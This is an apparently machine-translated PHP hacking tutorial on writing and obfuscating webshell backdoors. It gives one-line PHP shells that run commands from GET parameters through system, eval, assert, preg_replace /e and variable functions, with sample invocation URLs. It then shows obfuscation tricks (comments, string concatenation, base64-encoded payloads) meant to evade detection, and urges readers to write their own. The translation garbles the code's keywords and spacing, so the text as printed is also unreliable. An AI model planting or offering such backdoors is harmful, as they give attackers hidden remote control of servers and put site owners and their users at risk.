Php backdoor Compilation

0x1 Principle

1. functions that execute system commands

Proc_open, popen, exec, shell_exec, passthru, system

Only two examples are provided here. For other examples, you can refer to the php manual.

 

System ()

<? Php
System ($ _ GET ['input']);
?> Http: // 192.168.247.small: 81/shell. php? Input = dir

 

''.

''Command execution is equivalent to the shell_exec () function.

<? Php
Echo '$ _ GET [input]';
?> Http: // 192.168.247.small: 81/shell. php? Input = dir

And a shorter one.

<? = @ '$ _ GET [c]'?> Http: // www.2cto.com/shell. php? C = dir

Note: The short_open_tag must be enabled, but the default value is on.

2. functions that can execute code

The eval () function calculates the string according to the PHP code. The string must be a valid PHP code and must end with a semicolon.

<? Php
Eval ($ _ GET ['input']);
?> Regular Expression

The Preg_replace function is used to find and replace regular expressions. Among them, Mixed preg_replace (mixed pattern, mixed replacement, mixed subject, int limit, int & count, pattern is a regular expression used for search, replacement is used to replace the string, submit is the string to be searched for replacement, limit is the number of strings that can be replaced, and count is the number of successfully replaced strings. The function returns the replaced string. When the Pattern parameter uses the/e modifier, The preg_replace function executes the replacement parameter as PHP code.

<? Php
Preg_replace ("// e", $ _ GET ['input'], "qingsh4n ");
?> Assert ()

The assert function is used in php to determine whether an expression is true. However, the string parameter is executed.

<? Php
Assert ($ _ GET ['input']);
?> Ob_start ()

<? Php
$ Foobar = $ _ GET ['input1'];
Ob_start ($ foobar );
Echo $ _ GET ['input2'];
Ob_end_flush ();
?> Http: // 192.168.247.small: 81/shell. php? Input1 = system & input2 = dir

More functions need to be mined by comrades.

0x2 How to confuse

1. Comment /**/

<? Php
Assert/**/($/**/{"_ GET"} ['input']);
?> 2. connection number

"." In php is a string Connection Symbol

<? Php
$ Var = "";
$ Var. = "ss ";
$ Var. = "er ";
$ Var. = "t ";
$ Var ($ _ GET ['input']);
?> Note: echo (), eval () and other functions are invalid during the test.

 

3. Create a function

Create_function () creates an anonymous Function

<? Php
$ Foobar = $ _ GET ['input'];
$ Dyn_func = create_function ('$ qingsh4n', "echo $ foobar ;");
$ Dyn_func ('');
?> 5. Encoding functions, base64, etc.

<? Php
Assert (base64_decode ('zxzhbcgkx0dfvfsnw5wdxqnxsk7 '));
?> Note: Other encoding functions include gzinflate (), gzuncompress (), gzdecode (), and str_rot13 (). You can view the php manual.

 

6. Variable Functions

PHP supports the concept of variable functions. This means that if a variable name has parentheses, PHP will look for a function with the same name as the value of the variable and try to execute it.

<? Php
$ Dyn_func = $ _ GET ['dyn _ func'];
$ Argument = $ _ GET ['argument'];
$ Dyn_func ($ argument );
?> If register_globals = on, the code can be changed to the following format:

<? Php
$ Input1 ($ input2 );
?> Http: // 192.168.247.small: 81/shell. php? Input1 = system & input2 = dir

Note: functions such as call_user_func () and array_walk () can also be used.

0x3 write your own webshell

With the above knowledge, you can combine the code execution and obfuscation technologies written above to compile your own php backdoors, tell me if anyone has good discovery or odd sex skills. Finally, I will attach the six abnormal ways of writing hello world on the cool shell. I may find some inspiration here.

0x4 references

Http://www.php.net/

Http://www.php-security.org/2010/05/20/mops-submission-07-our-dynamic-php/index.html#sec22

Http://www.t00ls.net/viewthread.php? Tid = 18951

Http://www.bkjia.com/Article/201207/142926.html
Http://h.ackack.net/tiny-php-shell.html

Http://www.bkjia.com/Article/201208/146517.html

Ps: I wanted to write it well, but after reading the article by moyer Niu, I suddenly felt that everything was useless.

By qingsh4n

Http://hi.baidu.com/qingsh4n/item/d1ea580f5bd5c169bee97e0c